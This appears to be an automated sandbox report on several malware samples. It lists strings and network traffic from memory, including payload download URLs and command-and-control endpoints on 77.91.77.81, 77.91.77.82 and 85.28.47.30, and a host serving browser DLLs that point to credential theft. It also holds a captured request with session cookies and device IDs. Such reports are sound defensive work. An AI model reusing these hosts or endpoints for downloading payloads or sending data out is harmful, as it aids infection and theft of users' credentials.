Source: 06f6d9547f.exe, 0000000F.00000003.3012974820.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012164343.000000000151C000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3011183886.0000000001517000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: chromecache_132.17.dr String found in binary or memory: _.$w(p);break;case "PuZJUb":a+="https://www.youtube.com/t/terms?chromeless=1&hl="+_.$w(m);break;case "fxTQxb":a+="https://youtube.com/t/terms?gl="+_.$w(_.ix(c))+"&hl="+_.$w(d)+"&override_hl=1"+(f?"&linkless=1":"");break;case "prAmvd":a+="https://www.google.com/intl/"+_.$w(m)+"/chromebook/termsofservice.html?languageCode="+_.$w(d)+"&regionCode="+_.$w(c);break;case "NfnTze":a+="https://policies.google.com/privacy/google-partners"+(f?"/embedded":"")+"?hl="+_.$w(d)+"&gl="+_.$w(c)+(g?"&color_scheme="+ equals www.youtube.com (Youtube)
Source: 06f6d9547f.exe, 0000000F.00000003.3007411160.0000000003D39000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3007121727.0000000003D00000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3007248927.0000000003D1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountF"y^< equals www.youtube.com (Youtube)
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountK%DYW equals www.youtube.com (Youtube)
Source: 06f6d9547f.exe, 0000000F.00000002.3014345363.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp, 06f6d9547f.exe, 0000000F.00000003.3012408886.0000000003DC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accounts$ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900D492X-BM-CBT: 1696428841X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22X-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900D492X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticshX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 2484Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1720124382023&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exepData
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe-Disposition:
Source: file.exe, 00000000.00000002.2449562218.00000000007F8000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exeT
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe-
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe506
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/well/random.exe
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/well/random.exeL
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/well/random.exen
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/0
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3241803333.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php$
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php(
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/QLIa
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php2
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpF
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpU
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpV06f6d9547f.exe
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpfLI
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpiLqa8
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phplF~nj
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpuLma6
Source: explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/ot%
Source: file.exe, 00000000.00000002.2450878675.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30
Source: 0244247334.exe, 0000000E.00000002.3055852446.000000000192C000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.000000000191B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/freebl3.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dllX
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/mozglue.dlll
Source: file.exe, 00000000.00000002.2450878675.0000000001B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/msvcp140.dllX
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/nss3.dllll
Source: file.exe, 00000000.00000002.2450878675.0000000001B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001B24000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/softokn3.dllx
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/sqlite3.dll
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll
Source: 0244247334.exe, 0000000E.00000002.3055852446.000000000192C000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.000000000191B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.php
Source: 0244247334.exe, 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.php06001
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/920475a59bac849d.phpd
Source: 0244247334.exe, 0000000E.00000002.3055852446.000000000191B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30/ia
Source: 0244247334.exe, 0000000E.00000002.3055852446.00000000018DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30I
Source: file.exe, 00000000.00000002.2450878675.0000000001ACE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.30N?
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, 0244247334.exe.13.dr, random[1].exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: file.exe, 0244247334.exe.13.dr, random[1].exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: file.exe, 0244247334.exe.13.dr, random[1].exe.13.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2467277602.000000001D3AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2482080976.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, IJEHIDHD.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_132.17.dr String found in binary or memory: https://accounts.google.com
Source: chromecache_132.17.dr String found in binary or memory: https://accounts.google.com/TOS?loc=
Source: chromecache_124.17.dr String found in binary or memory: https://apis.google.com/js/api.js
Source: chromecache_132.17.dr String found in binary or memory: https://apis.google.com/js/rpc:shindig_random.js?onload=credentialservice.postMessage
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: IJEHIDHD.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2449039751.0000000001B51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, IJEHIDHD.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2449039751.0000000001B51000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, IJEHIDHD.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2450878675.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2449039751.0000000001C27000.00000004.00000020.00020000.00000000.sdmp, KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: IJEHIDHD.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: IJEHIDHD.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: IJEHIDHD.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_132.17.dr String found in binary or memory: https://families.google.com/intl/
Source: chromecache_132.17.dr String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/drive_2020q4/v10/192px.svg
Source: chromecache_132.17.dr String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/gmail_2020q4/v10/web-48dp/logo_gmail_2020q4_color_2x_web_
Source: chromecache_132.17.dr String found in binary or memory: https://fonts.gstatic.com/s/i/productlogos/maps/v7/192px.svg
Source: chromecache_132.17.dr String found in binary or memory: https://g.co/recover
Source: KKECFIEBGCAKJKECGCFI.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_132.17.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_132.17.dr String found in binary or memory: https://play.google.com/work/enroll?identifier=
Source: chromecache_132.17.dr String found in binary or memory: https://play.google/intl/
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/privacy
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/privacy/additional
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/privacy/additional/embedded?gl=kr
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/privacy/google-partners
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/technologies/cookies
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/technologies/location-data
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/terms
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/terms/location/embedded
Source: chromecache_132.17.dr String found in binary or memory: https://policies.google.com/terms/service-specific
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-email-pin.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-password.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-or-voice-pin.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-sms-pin.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/account-recovery-stop-go-landing-page_1x.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/animation/
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_device.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/ble_pin.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_1x.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_2x.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/contacts_backup_sync_darkmode_1x.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/continue_on_your_phone.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_phone_number_verification.png
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_silent_tap_yes_darkmode.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_tap_yes.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/device_prompt_tap_yes_darkmode.gif
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kid_success.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kid_success_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_updated.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidfork_who_will_use_updated_darkmode.svg
Source: chromecache_132.17.dr String found in binary or memory: https://ssl.gstatic.com/accounts/embedded/kidsignin_not_ready.png
